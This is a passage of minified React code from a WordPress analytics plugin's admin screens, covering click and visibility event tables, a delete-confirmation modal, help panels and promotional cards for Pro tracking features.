sm:space-y-5",style:{display:h?"none":"block"}},(0,e.createElement)("div",{className:"sm:grid sm:grid-cols-3 sm:gap-4 sm:items-start sm:border-t sm:border-gray-200 sm:pt-5"},(0,e.createElement)("label",{htmlFor:"selectorType",className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Additional Properties"),(0,e.createElement)("input",{type:"text",name:"dkey",placeholder:"Key",maxLength:"40",id:"dkey",value:w,onChange:e=>T(e.target.value),disabled:C,className:"flex-1 block w-full focus:ring-indigo-500 focus:border-indigo-500 min-w-0 rounded-none rounded-r-md sm:text-sm border-gray-300"}),(0,e.createElement)("input",{type:"text",name:"dvalue",placeholder:"Value",id:"dvalue",maxLength:"100",value:E,onChange:e=>S(e.target.value),disabled:C,className:"flex-1 block w-full focus:ring-indigo-500 focus:border-indigo-500 min-w-0 rounded-none rounded-r-md sm:text-sm border-gray-300"}),(0,e.createElement)("div",{className:"flex w-full justify-end items-end col-end-4"},(0,e.createElement)("button",{type:"button",onClick:()=>{let e={...D};e[w]=E,Object.keys(e).length>=25&&z(!0),f(e)},disabled:C,className:"inline-flex items-center center w-28 px-4 py-1.5 border border-transparent text-xs font-medium rounded text-white bg-brand-primary hover:bg-brand-primary-hover focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-brand-primary-focus"},"Add Property")))),(0,e.createElement)("div",{"data-component":"props-table",className:"flex flex-col bg-gray-50 rounded-50 mt-6 "},(0,e.createElement)(Oi,{properties:D,isRecommended:h,recommendedEvents:o,eventName:g,setProp:q,deleteProp:e=>{let t={...D};delete t[e],Object.keys(t).length<25&&z(!1),f(t)}})))):"")))),(0,e.createElement)(bi,{onCancel:()=>l(!1)})))),!1))))))))},Fi=t=>{let{open:a,toggleDeleteModal:i,customEvent:n,customEventId:u,deleteEvent:s,updateFunction:l}=t;return(0,e.createElement)(vt.Root,{show:a,as:r.Fragment},(0,e.createElement)(Ua,{as:"div",className:"relative z-10",onClose:i},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"ease-out duration-300",enterFrom:"opacity-0",enterTo:"opacity-100",leave:"ease-in duration-200",leaveFrom:"opacity-100",leaveTo:"opacity-0"},(0,e.createElement)("div",{className:"fixed inset-0 bg-gray-500 bg-opacity-75 transition-opacity"})),(0,e.createElement)("div",{className:"fixed z-10 inset-0 overflow-y-auto"},(0,e.createElement)("div",{className:"flex items-end sm:items-center justify-center min-h-full p-4 text-center sm:p-0"},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"ease-out duration-300",enterFrom:"opacity-0 translate-y-4 sm:translate-y-0 sm:scale-95",enterTo:"opacity-100 translate-y-0 sm:scale-100",leave:"ease-in duration-200",leaveFrom:"opacity-100 translate-y-0 sm:scale-100",leaveTo:"opacity-0 translate-y-4 sm:translate-y-0 sm:scale-95"},(0,e.createElement)(Ua.Panel,{className:"relative bg-white rounded-lg px-4 pt-5 pb-4 text-left overflow-hidden shadow-xl transform transition-all sm:my-8 sm:max-w-lg sm:w-full sm:p-6"},(0,e.createElement)("div",{className:"sm:flex sm:items-start"},(0,e.createElement)("div",{className:"mx-auto flex-shrink-0 flex items-center justify-center h-12 w-12 rounded-full bg-red-100 sm:mx-0 sm:h-10 sm:w-10"}),(0,e.createElement)("div",{className:"mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left"},(0,e.createElement)(Ua.Title,{as:"h3",className:"text-lg leading-6 font-medium text-gray-900"},"Delete Custom Event"),(0,e.createElement)("div",{className:"mt-2"},(0,e.createElement)("p",{className:"text-sm text-gray-500"},"Are you sure you want to delete the"," ",(0,e.createElement)("span",{className:"strong"},n)," ","customEvent?")))),(0,e.createElement)("div",{className:"mt-5 sm:mt-4 sm:flex sm:flex-row-reverse"},(0,e.createElement)("button",{type:"button",className:"w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-red-600 text-base font-medium text-white hover:bg-red-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-red-500 focus:ring-red-500 sm:ml-3 sm:w-auto sm:text-sm",onClick:function(){s(u),l(),i()}},"Delete"),(0,e.createElement)("button",{type:"button",className:"mt-3 w-full inline-flex justify-center rounded-md border border-gray-300 shadow-sm px-4 py-2 bg-white text-base font-medium text-gray-700 hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500 sm:mt-0 sm:w-auto sm:text-sm",onClick:i},"Cancel"))))))))},_i=t=>{let{pKey:r,pValue:a,del:i}=t;return(0,e.createElement)("div",{"data-component":"tag",className:"mr-3 mb-2 whitespace-nowrap flex",key:r},(0,e.createElement)("span",{className:" items-center px-3 py-0.5 rounded-l-lg text-sm font-medium bg-gray-200 text-gray-600"},r),(0,e.createElement)("span",{className:"items-center px-3 py-0.5 rounded-r-lg text-sm font-medium bg-gray-400 text-white truncate max-w-[10ch] text-ellipsis"},a))},qi=()=>(0,e.createElement)(e.Fragment,null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Need Help with Click Tracking?"),(0,e.createElement)("span",{className:"block pt-5 pb-5"},"Our Click Tracking feature allows you to easily monitor clicks on buttons, links, and other elements on your WordPress site. Check out this brief guide and the accompanying video tutorial for a clear, step-by-step explanation on setting up and using Click Tracking to enhance your Google Analytics insights."),(0,e.createElement)("div",null,(0,e.createElement)("iframe",{width:"576",height:"360",src:"https://www.youtube.com/embed/lpG4VNVpemo",title:"YouTube video player",frameBorder:"0",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share",allowFullScreen:!0}))),Bi=()=>(0,e.createElement)(e.Fragment,null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Need Help with Visibility Tracking?"),(0,e.createElement)("span",{className:"block pt-5 pb-5"},"Our Visibility Tracking feature enables you to effectively track when specific elements, such as ads, banners, or forms, come into view for your site visitors. Consult this concise guide and the accompanying video tutorial for a comprehensive, step-by-step breakdown on configuring and utilizing Visibility Tracking to improve your Google Analytics data."),(0,e.createElement)("div",null,(0,e.createElement)("iframe",{width:"576",height:"360",src:"https://www.youtube.com/embed/9nhR6W5w060",title:"YouTube video player",frameBorder:"0",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share",allowFullScreen:!0})));function Zi(t){let{type:a,customEvents:i,deleteEvent:n,updateFunction:u}=t;const[s,l]=(0,r.useState)(!1),[c,L]=(0,r.useState)(!1),[M,d]=(0,r.useState)([]),[j,m]=(0,r.useState)(!1),[N,y]=(0,r.useState)(!1),[p,g]=(0,r.useState)(!1),[x,w]=(0,r.useState)(),[T,E]=(0,r.useState)(),{setOpenHelpSlider:S,setTitleHelpSlider:D,setComponent:f}=_t();return(0,r.useLayoutEffect)((()=>{M.length>0&&(M.length,i.length)}),[M]),(0,e.createElement)(Pa.Provider,{value:{type:a}},(0,e.createElement)(Ra.Provider,{value:mr},(0,e.createElement)("div",{"data-component":"EventsTable",className:o()("pb-6","bg-white/50","shadow-xl")},(0,e.createElement)(Ri,{eventType:"Recommended Event",currentCustomEvent:T,setCurrentCustomEvent:E,updateFunction:u,open:N,setOpen:y}),(0,e.createElement)(Ri,{eventType:"Custom Event",currentCustomEvent:x,setCurrentCustomEvent:w,updateFunction:u,open:j,setOpen:function(){m(!j)}}),(0,e.createElement)(ir,{setAddCustomEventForm:m,setAddRecommendedEventForm:y}),(0,e.createElement)("div",{className:"mt-8 flex flex-col px-4 lg:px-6"},(0,e.createElement)("div",{className:"-my-2 -mx-4 overflow-x-auto sm:-mx-6 lg:-mx-8"},(0,e.createElement)("div",{className:o()("inline-block min-w-full ","align-middle","py-2 px-4 lg:px-6")},(0,e.createElement)("div",{className:"relative overflow-hidden shadow ring-1 ring-black ring-opacity-5 md:rounded-lg"},(0,e.createElement)("table",{className:"w-full table-fixed divide-y divide-gray-300"},(0,e.createElement)("thead",{className:"bg-white/75"},(0,e.createElement)("tr",null,(0,e.createElement)("th",{scope:"col",className:"min-w-[12rem] py-3.5 pr-3 pl-4 text-left text-sm font-semibold text-gray-900"},"Custom Event Name"),(0,e.createElement)("th",{scope:"col",className:"w-[10rem] relative py-3.5 pl-3 pr-4 sm:pr-6"},(0,e.createElement)("span",{className:"sr-only"},"Edit")))),(0,e.createElement)("tbody",{className:" bg-white w-full"},0==i.length&&!j&&(0,e.createElement)("tr",null,(0,e.createElement)("td",{colSpan:5,className:"w-full"},(0,e.createElement)(jr,{type:a,setOpenHelpSlider:()=>{const e=`Tracking your first ${a} event`;let t;switch(a){case"click":t=qi;break;case"visibility":t=Bi;break;default:return void console.error(`Unknown tracking type: ${a}`)}D(e),f(t),S(!0)}}))),i.map(((t,a)=>(0,e.createElement)(r.Fragment,{key:a},(0,e.createElement)("tr",{className:o()(M.includes(t)?"bg-gray-50":void 0,"border-b border-gray-400")},(0,e.createElement)("td",{className:o()("px-4 text-base font-medium","py-1","pt-2",M.includes(t)?"text-gtIndigo-600":"text-gray-900")},(0,e.createElement)("div",null,(0,e.createElement)("span",{className:"text-xs text-gray-400 mr-2 uppercase"},"Event Name"),t.eventName),(0,e.createElement)("div",{className:"text-sm text-gray-600 my-2"},(0,e.createElement)("span",{className:"text-xs text-gray-400 mr-2 uppercase"},"Selector"),t.selector),(0,e.createElement)("div",{className:"text-xs text-gray-400 mr-2 mt-4 uppercase"},"Event Properties"),(0,e.createElement)("div",{className:"flex flex-start w-full items-center content-between py-4 flex-wrap"},t.props&&Object.entries(t.props).filter((e=>{let[t,r]=e;return"items"!==t})).map((t=>{let[r,a]=t;return a?(0,e.createElement)(_i,{key:r,pKey:r,pValue:a,del:""}):""})))),(0,e.createElement)("td",{className:"bg-slate-50/75 py-6 px-2 text-right text-sm font-medium sm:px-4 w-[16rem]"},(0,e.createElement)("div",{className:"flex items-center flex-wrap space-x-1"},(0,e.createElement)("button",{type:"button",onClick:e=>function(e,t){e.preventDefault();let r={...t};r.edit=!0,r.isRecommended?(E({...r}),y(!0)):(w({...r}),m(!0))}(e,t),className:o()("flex-1","hover:shadow-xl flex items-center","px-2.5 py-1.5 border border-transparent","text-xs font-medium rounded shadow-sm","focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-brand-primary-focus","text-white","bg-brand-primary hover:bg-brand-600")},(0,e.createElement)(cr,{className:"h-4 w-4 mr-1","aria-hidden":"true"}),(0,e.createElement)("div",{className:"flex-1"},"Edit")),(0,e.createElement)("button",{type:"button",onClick:e=>function(e,t){e.preventDefault(),w(t),g(!0)}(e,t),className:o()("hover:shadow-xl flex items-center","px-2.5 py-1.5 border border-transparent","text-xs font-medium rounded shadow-sm","focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-brand-primary-focus","text-white","bg-brand-danger hover:bg-brand-danger-hover")},(0,e.createElement)(Lr,{className:"h-4 w-4 mx-1","aria-hidden":"true"}),(0,e.createElement)("div",{className:"flex-1 sr-only"},"Delete")))))))))),p&&x&&(0,e.createElement)(Fi,{open:p,toggleDeleteModal:function(){g(!p)},customEvent:x.eventName,customEventId:x.id,deleteEvent:n,updateFunction:u}))))))))}const{useEffect:Wi,useRef:Hi}=wp.element,Vi=(e,t)=>{const r=Hi(!0);Wi((()=>{if(!r.current)return e();r.current=!1}),t)},Ji=e=>Wi((()=>e),[]),{apiFetch:Xi}=wp,{isEqual:Ki}=lodash,$i=()=>{const[t,a]=(0,r.useState)([{eventName:"",selector:""}]),{showPromo:i,setShowPromo:n}=lr(),[u,s]=(0,r.useState)(!1),[l,o]=(0,r.useState)(!1),[c,L]=(0,r.useState)(!1),[M,d]=(0,r.useState)(!1),j=async()=>{let e=await async function(){return await Xi({path:wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/get_events?type=click"})}();e.length>=2?n(!0):n(!1),a(e)};return(0,r.useEffect)((()=>{j()}),[]),Vi((()=>{})),Ji((()=>{})),(0,e.createElement)(Zi,{key:t.selector,type:"click",customEvents:t,deleteEvent:async function(e){let t=await Xi({path:wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/delete_event?id="+e,method:"DELETE"});return j(),t},updateFunction:j})},{apiFetch:en}=wp,{isEqual:tn}=lodash,rn=()=>{const[t,a]=(0,r.useState)([{eventName:"",selector:""}]),{showPromo:i,setShowPromo:n}=lr(),[u,s]=(0,r.useState)(!1),[l,o]=(0,r.useState)(!1),[c,L]=(0,r.useState)(!1),[M,d]=(0,r.useState)(!1),j=async()=>{let e=await async function(){return await en({path:wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/get_events?type=visibility"})}();e.length>=2?n(!0):n(!1),a(e)};return(0,r.useEffect)((()=>{j()}),[]),Vi((()=>{})),Ji((()=>{})),(0,e.createElement)(e.Fragment,null,(0,e.createElement)(Zi,{key:t.selector,type:"visibility",customEvents:t,deleteEvent:async function(e){return await en({path:wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/delete_event?id="+e,method:"DELETE"})},updateFunction:j}))},{apiFetch:an}=wp,{isEqual:nn}=lodash;function un(){for(var e=arguments.length,t=new Array(e),r=0;r<e;r++)t[r]=arguments[r];return t.filter(Boolean).join(" ")}const sn=()=>(0,e.createElement)("div",{"data-component":"EventsTable",className:un("pb-6","bg-white/50","shadow-xl")},(0,e.createElement)(nr,null),(0,e.createElement)("div",{className:"mt-8 flex flex-col px-4"},(0,e.createElement)("div",{className:un("w-full","pt-10 px-6","space-y-8 divide-y divide-gray-200 rounded-md","border border-gray-200","bg-white shadow")},(0,e.createElement)("div",{className:"space-y-8 divide-y divide-gray-200 sm:space-y-5"},(0,e.createElement)(Vt,{title:"Video Tracking",titleHelper:"Track YouTube, Vimeo, and Self-Hosted Videos",proLabel:!0,ctaURL:"https://www.wpgoaltracker.com/7iha"}),(0,e.createElement)("div",{className:"space-y-6 sm:space-y-5 divide-y divide-gray-200 opacity-60"},(0,e.createElement)("div",{className:"pt-6 sm:pt-5"},(0,e.createElement)("div",{role:"group","aria-labelledby":"label-track-Links"},(0,e.createElement)("div",{className:"sm:grid sm:grid-cols-3 sm:gap-4 sm:items-baseline"},(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"text-base font-medium text-gray-900 sm:text-sm sm:text-gray-700",id:"label-youtube-video-tracking"},"Track YouTube Videos")),(0,e.createElement)("div",{className:"mt-4 sm:mt-0 sm:col-span-2"}))))),(0,e.createElement)("div",{className:"space-y-6 sm:space-y-5 divide-y divide-gray-200 opacity-60"},(0,e.createElement)("div",{className:"pt-6 sm:pt-5"},(0,e.createElement)("div",{role:"group","aria-labelledby":"label-track-Links"},(0,e.createElement)("div",{className:"sm:grid sm:grid-cols-3 sm:gap-4 sm:items-baseline"},(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"text-base font-medium text-gray-900 sm:text-sm sm:text-gray-700",id:"label-vimeo-video-tracking"},"Track Vimeo Videos")),(0,e.createElement)("div",{className:"mt-4 sm:mt-0 sm:col-span-2"}))))),(0,e.createElement)("div",{className:"space-y-6 sm:space-y-5 divide-y divide-gray-200 opacity-60"},(0,e.createElement)("div",{className:"pt-6 sm:pt-5"},(0,e.createElement)("div",{role:"group","aria-labelledby":"label-track-Links"},(0,e.createElement)("div",{className:"sm:grid sm:grid-cols-3 sm:gap-4 sm:items-baseline"},(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"text-base font-medium text-gray-900 sm:text-sm sm:text-gray-700",id:"label-media-video-tracking"},"Track Self-Hosted Media Videos")),(0,e.createElement)("div",{className:"mt-4 sm:mt-0 sm:col-span-2"})))))),(0,e.createElement)("div",{className:"space-y-8 divide-y divide-gray-200 sm:space-y-5 pt-10"},(0,e.createElement)(Vt,{title:"Audio Tracking",titleHelper:"Track Hosted Audio Files (Media Library)",proLabel:!0,ctaURL:"https://www.wpgoaltracker.com/1m3n"}),(0,e.createElement)("div",{className:"space-y-6 sm:space-y-5 divide-y divide-gray-200 opacity-60"},(0,e.createElement)("div",{className:"pt-6 sm:pt-5"},(0,e.createElement)("div",{role:"group","aria-labelledby":"label-track-Links"},(0,e.createElement)("div",{className:"sm:grid sm:grid-cols-3 sm:gap-4 sm:items-baseline"},(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"text-base font-medium text-gray-900 sm:text-sm sm:text-gray-700",id:"label-media-audio-tracking"},"Track Self Hosted Audio")),(0,e.createElement)("div",{className:"mt-4 sm:mt-0 sm:col-span-2"})))))),(0,e.createElement)("footer",{className:"px-5 py-5 bg-gray-100 shadow-2xl -mx-5"},(0,e.createElement)("div",{className:"flex justify-end space-x-3"}))))),{apiFetch:ln}=wp,{isEqual:on}=lodash,cn=()=>{const[t,a]=(0,r.useState)({trackFormSubmit:!1,trackInvalids:!1,trackMailSent:!1,trackMailFailed:!1,trackSpam:!1});return(0,e.createElement)("div",{"data-component":"EventsTable",className:o()("pb-6","bg-white/50","shadow-xl")},(0,e.createElement)(nr,null),(0,e.createElement)("div",{className:"bg-white/75"},(0,e.createElement)("div",{className:"bg-white/50 p-5 rounded shadow-xl"},(0,e.createElement)("div",{"data-component":"SectionContainer",className:"space-y-8 sm:space-y-5"},(0,e.createElement)(Rt,null,(0,e.createElement)(Vt,{title:"Contact Form 7",titleHelper:"Enable tracking for Contact Form 7 forms on your website.",helpTitle:"Connecting with Google Analytics",proLabel:!0,ctaURL:"https://www.wpgoaltracker.com/2qvp"}),(0,e.createElement)(Pt,{className:"opacity-60"},(0,e.createElement)(Gt,{label:"Track Successful Form Submissions",id:"",description:"The plugin will track an event only when a form submission is successful, and an email is sent.",isPrimary:!1}),(0,e.createElement)(Gt,{label:"Track Failed Form Validations",id:"",description:"Track and event when someone submits an invalid form (mostly missing required fields).",isPrimary:!1}),(0,e.createElement)(Gt,{label:'Track "Failed To Send Email" Events',id:"",description:"When the form submits successfully but Contact Form 7 failed to send out the email.",isPrimary:!1}),(0,e.createElement)(Gt,{label:"Track SPAM",id:"",description:"When Contact Form 7 detects possible spam activity.",isPrimary:!1}),(0,e.createElement)(Gt,{label:"Track Form Submit Click (click ≠ success)",id:"",description:"Toggling this option will track submit button clicks regardless of the submission status (click ≠ success).",isPrimary:!1})))),(0,e.createElement)("footer",{className:"px-5 py-5 bg-gray-100 shadow-2xl -mx-5"},(0,e.createElement)("div",{className:"flex justify-end space-x-3"})))))},{apiFetch:Ln}=wp,{isEqual:Mn}=lodash,dn=()=>{const[t,a]=(0,r.useState)({viewItem:!1,addToCart:!1,viewCart:!1,beginCheckout:!1,addShippingInfo:!1,addPaymentInfo:!1,purchase:!1});return(0,e.createElement)("div",{"data-component":"EventsTable",className:o()("pb-6","bg-white/50","shadow-xl")},(0,e.createElement)(nr,null),(0,e.createElement)("div",{className:"bg-white/75"},(0,e.createElement)("div",{className:"bg-white/50 p-5 rounded shadow-xl"},(0,e.createElement)("div",{"data-component":"SectionContainer",className:"space-y-8 sm:space-y-5"},(0,e.createElement)(Rt,null,(0,e.createElement)(Vt,{title:"WooCommerce Tracking",titleHelper:"Track WooCommerce events with Google Analytics",helpTitle:"WooCommerce",beta:!0,proLabel:!0,ctaURL:"https://www.wpgoaltracker.com/71iv"}),(0,e.createElement)(Pt,{className:"opacity-60"},[{id:"viewItem",label:"View Item",description:"Track when a user views an item."},{id:"addToCart",label:"Add to Cart",description:"Track when a user adds an item to their cart."},{id:"beginCheckout",label:"Begin Checkout",description:"Track when a user starts the checkout process."},{id:"addShippingInfo",label:"Add Shipping Info",description:"Track when the user has entered the shipping info in the checkout process."},{id:"addPaymentInfo",label:"Add Payment Info",description:"Track when the user has entered the payment info in the checkout process."},{id:"purchase",label:"Purchase",description:"Track when a user purchases an item."}].map((t=>(0,e.createElement)(Gt,{key:t.id,id:t.id,label:`Track '${t.label}'`,isPrimary:!1,description:t.description})))))),(0,e.createElement)("footer",{className:"px-5 py-5 bg-gray-100 shadow-2xl -mx-5"},(0,e.createElement)("div",{className:"flex justify-end space-x-3"})))))};function jn(){return(0,e.createElement)(e.Fragment,null,(0,e.createElement)(ye,null,(0,e.createElement)(me,{index:!0,element:(0,e.createElement)($i,null)}),(0,e.createElement)(me,{path:"click-tracking",element:(0,e.createElement)($i,null)}),(0,e.createElement)(me,{path:"visibility-tracking",element:(0,e.createElement)(rn,null)}),(0,e.createElement)(me,{path:"ecommerce-tracking",element:(0,e.createElement)(dn,null)}),(0,e.createElement)(me,{path:"video-tracking",element:(0,e.createElement)(sn,null)}),(0,e.createElement)(me,{path:"form-tracking",element:(0,e.createElement)(cn,null)})))}function mn(){return(0,e.createElement)("article",{className:o()("flex flex-col flex-1 justify-end w-full","relative","rounded-2xl p-6 lg:p-8","sm:flex sm:items-end","lg:items-end","shadow-xl hover:shadow-2xl","bg-slate-800")},(0,e.createElement)("header",{className:"text-start text-3xl font-bold tracking-tight text-white w-full"},(0,e.createElement)("img",{className:o()("object-cover w-28 h-auto mr-2"),src:Xt}),"Track Video & Audio"),(0,e.createElement)("div",{className:"flex-1 w-full justify-self-end mt-4 xl:mt-20 mb-8"},(0,e.createElement)("p",{className:"text-xl font-semibold tracking-tight text-white"},"Are your videos performing well?"),(0,e.createElement)("div",{className:"mt-2 text-base leading-7"},(0,e.createElement)("div",{className:"text-lg text-gray-300"},"Most people underestimate how long it actually takes to create a good video (or a podcast).",(0,e.createElement)("p",{className:"mt-4 text-lg text-gray-300"},"First, there’s the script. Then you have to set up all the gear just right and then all the takes when recording. But that’s even before you start editing the video. ",(0,e.createElement)("br",null),"(or maybe you spent a lot of money having someone else make the video)"),(0,e.createElement)("p",{className:"mt-4 text-lg text-gray-300"},"But are the videos on your website delivering?"," "),(0,e.createElement)("p",{className:"mt-4 text-lg text-gray-300"},"Wouldn’t it be great to see how many people became leads or made a purchase after watching a video?"," "),(0,e.createElement)("p",{className:"mt-4 text-lg text-gray-300"},"Here’s how Goal Tracker Pro can help you:"," ")),(0,e.createElement)("ul",{className:"px-2 space-y-2 divide-y divide-white/10 my-4  text-gray-300"},(0,e.createElement)("li",null,"Track all of your embedded ",(0,e.createElement)("b",{className:"text-white"},"YouTube")," ","videos"),(0,e.createElement)("li",null,"Track all of your ",(0,e.createElement)("b",{className:"text-white"},"Vimeo")," videos"),(0,e.createElement)("li",null,"Track ",(0,e.createElement)("b",{className:"text-white"},"self hosted videos")," (uploaded videos)"),(0,e.createElement)("li",null,"Track self hosted ",(0,e.createElement)("b",{className:"text-white"},"Audio")," (Your music/samples/podcast recordings)")),(0,e.createElement)("div",{className:"mt-2 text-lg text-gray-300"},"Goal Tracker Pro will tell you:"),(0,e.createElement)("ul",{className:"px-2 space-y-2 divide-y divide-white/10 my-4  text-gray-300"},(0,e.createElement)("li",null,"How many people played the video"),(0,e.createElement)("li",null,"Video progress"),(0,e.createElement)("li",null,"How many people finished watching the video")))),(0,e.createElement)("footer",{className:"flex items-center"},(0,e.createElement)("a",{href:wpGoalTrackerGa.upgradeUrl,type:"button",className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent ","bg-white text-brand-primary","px-4 py-2","text-sm font-medium","shadow hover:shadow-xl","transform active:scale-75 hover:scale-110 transition-transform","hover:ring-2 hover:ring-white hover:ring-offset-2","focus:outline-none focus:ring-2 focus:ring-white focus:ring-offset-2")},(0,e.createElement)("span",{className:"mx-2"},"I want to track my videos"),(0,e.createElement)(Ge,{className:"h-5 w-5","aria-hidden":"true"}))))}function Nn(){return(0,e.createElement)("article",{className:o()("flex flex-col flex-1 justify-end w-full","relative","rounded-2xl p-6 lg:p-8","sm:flex sm:items-end","lg:items-end","shadow-xl hover:shadow-2xl","bg-brand-900")},(0,e.createElement)("header",{className:"text-start text-3xl font-bold tracking-tight text-white w-full"},(0,e.createElement)("img",{className:o()("object-cover w-28 h-auto mr-2"),src:Kt}),"Contact Form 7"),(0,e.createElement)("div",{className:"flex-1 w-full justify-self-end mt-4 xl:mt-32 mb-8"},(0,e.createElement)("p",{className:"text-xl font-semibold tracking-tight text-white"},"Track your Contact Form 7 Submissions"," "),(0,e.createElement)("div",{className:"mt-2 text-base leading-7 text-white/70"},(0,e.createElement)("div",{className:"text-lg text-gray-300"},"In Goal Tracker for Google Analytics Pro we integrated with the Contact Form 7 plugin:"),(0,e.createElement)("ul",{className:"px-2 space-y-2 divide-y divide-white/10 my-4  text-gray-300"},(0,e.createElement)("li",null,"Track form submission conversions in Google Analytics."),(0,e.createElement)("li",null,"The plugin can track successful conversions and filter out non relevant clicks."),(0,e.createElement)("li",null,"Optimize your forms - Track form validation issues."),(0,e.createElement)("li",null,"Clean statistics - Get statistics on spam submissions."),(0,e.createElement)("li",null,"Track failed email attempts.")),(0,e.createElement)("div",{className:"text-white"},"Upgrade now to elevate your analytics experience with Contact Form 7 form tracking in Goal Tracker Pro!"))),(0,e.createElement)("footer",{className:"flex items-center"},(0,e.createElement)("a",{href:wpGoalTrackerGa.upgradeUrl,type:"button",className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent ","bg-white text-brand-primary","px-4 py-2","text-sm font-medium","shadow hover:shadow-xl","transform active:scale-75 hover:scale-110 transition-transform","hover:ring-2 hover:ring-white hover:ring-offset-2","focus:outline-none focus:ring-2 focus:ring-white focus:ring-offset-2")},(0,e.createElement)("span",{className:"mx-2"},"Get Pro Features"),(0,e.createElement)(Ge,{className:"h-5 w-5","aria-hidden":"true"}))))}function yn(){return(0,e.createElement)("article",{className:o()("flex flex-col flex-1 justify-end w-full","relative","rounded-2xl p-6 lg:p-8","sm:flex sm:items-end","lg:items-end","shadow-xl hover:shadow-2xl","bg-brand-900")},(0,e.createElement)("header",{className:"text-start text-3xl font-bold tracking-tight text-white w-full"},(0,e.createElement)("img",{className:o()("object-cover w-28 h-auto mr-2"),src:Jt}),"User Tracking"),(0,e.createElement)("div",{className:"flex-1 w-full justify-self-end mt-4 xl:mt-32 mb-8"},(0,e.createElement)("p",{className:"text-xl font-semibold tracking-tight text-white"},"Introducing User Tracking for a Deeper Understanding of Your Audience"),(0,e.createElement)("div",{className:"mt-2 text-base leading-7 text-white/70"},(0,e.createElement)("div",{className:"text-lg text-gray-300"},"Upgrade to Goal Tracker Pro and harness the power of User Tracking:"),(0,e.createElement)("ul",{className:"px-2 space-y-2 divide-y divide-white/10 my-4  text-gray-300"},(0,e.createElement)("li",null,"Gain valuable insights into individual user behavior across multiple sessions and devices."),(0,e.createElement)("li",null,"Enhance your marketing strategies, user experience, and overall website performance with data-driven decisions."),(0,e.createElement)("li",null,"Ensure user privacy protection by using hashed identifiers that comply with data privacy regulations."),(0,e.createElement)("li",null,"Unlock the full potential of your website's analytics capabilities for a more comprehensive view of your audience.")),(0,e.createElement)("div",{className:"text-white"},"Upgrade now to elevate your analytics experience with User Tracking in Goal Tracker Pro!"))),(0,e.createElement)("footer",{className:"flex items-center"},(0,e.createElement)("a",{href:wpGoalTrackerGa.upgradeUrl,type:"button",className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent ","bg-white text-brand-primary","px-4 py-2","text-sm font-medium","shadow hover:shadow-xl","transform active:scale-75 hover:scale-110 transition-transform","hover:ring-2 hover:ring-white hover:ring-offset-2","focus:outline-none focus:ring-2 focus:ring-white focus:ring-offset-2")},(0,e.createElement)("span",{className:"mx-2"},"Get Pro Features"),(0,e.createElement)(Ge,{className:"h-5 w-5","aria-hidden":"true"}))))}function pn(){return(0,e.createElement)("article",{className:o()("flex flex-col flex-1 justify-end w-full","relative","rounded-2xl p-6 lg:p-8","sm:flex sm:items-end","lg:items-end","shadow-xl hover:shadow-2xl","bg-indigo-700")},(0,e.createElement)("header",{className:"text-start text-3xl font-bold tracking-tight text-white w-full"},(0,e.createElement)("img",{className:o()("object-cover w-28 h-auto mr-2"),src:Xt}),"Smart Placeholders"),(0,e.createElement)("div",{className:"flex-1 w-full justify-self-end mt-4 xl:mt-20 mb-8"},(0,e.createElement)("p",{className:"text-xl font-semibold tracking-tight text-white"},"Become a GA Power User"),(0,e.createElement)("div",{className:"mt-2 text-base leading-7"},(0,e.createElement)("div",{className:"text-lg text-gray-300"},"One of the biggest hassles in Google Analytics is getting the data into events.",(0,e.createElement)("p",{className:"mt-4 text-lg text-gray-300"},"In GTM, this means working with endless variables. Or writing JavaScript code to make the data available in the first place."),(0,e.createElement)("p",{className:"mt-4 text-lg text-gray-300"},"But we are WordPress users. We want this to be simple."),(0,e.createElement)("p",{className:"mt-4 text-lg text-gray-300"},"So we created the Placeholders feature in Goal Tracker Pro."),(0,e.createElement)("p",{className:"mt-4 text-lg text-gray-300"},(0,e.createElement)("i",null,"(If you’ve worked with email marketing software - think mail merge or liquid templates)")),(0,e.createElement)("p",{className:"mt-4 text-lg text-gray-300"},"Placeholders allow you to add data from the element, page, or session to the event. Here are a few examples:")),(0,e.createElement)("ul",{className:"px-2 space-y-2 divide-y divide-white/10 my-4  text-gray-300"},(0,e.createElement)("li",null,"Page Author"),(0,e.createElement)("li",null,"Post Category"),(0,e.createElement)("li",null,"Value Attribute"),(0,e.createElement)("li",null,"Referrer"),(0,e.createElement)("li",null,"Text"),(0,e.createElement)("li",null,"User Role"),(0,e.createElement)("li",null,"Data Attributes")),(0,e.createElement)("div",{className:"mt-2 text-lg text-gray-300"},"This is a real game changer for power users who work with a lot of events."))),(0,e.createElement)("footer",{className:"flex items-center"},(0,e.createElement)("a",{href:wpGoalTrackerGa.upgradeUrl,type:"button",className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent ","bg-white text-brand-primary","px-4 py-2","text-sm font-medium","shadow hover:shadow-xl","transform active:scale-75 hover:scale-110 transition-transform","hover:ring-2 hover:ring-white hover:ring-offset-2","focus:outline-none focus:ring-2 focus:ring-white 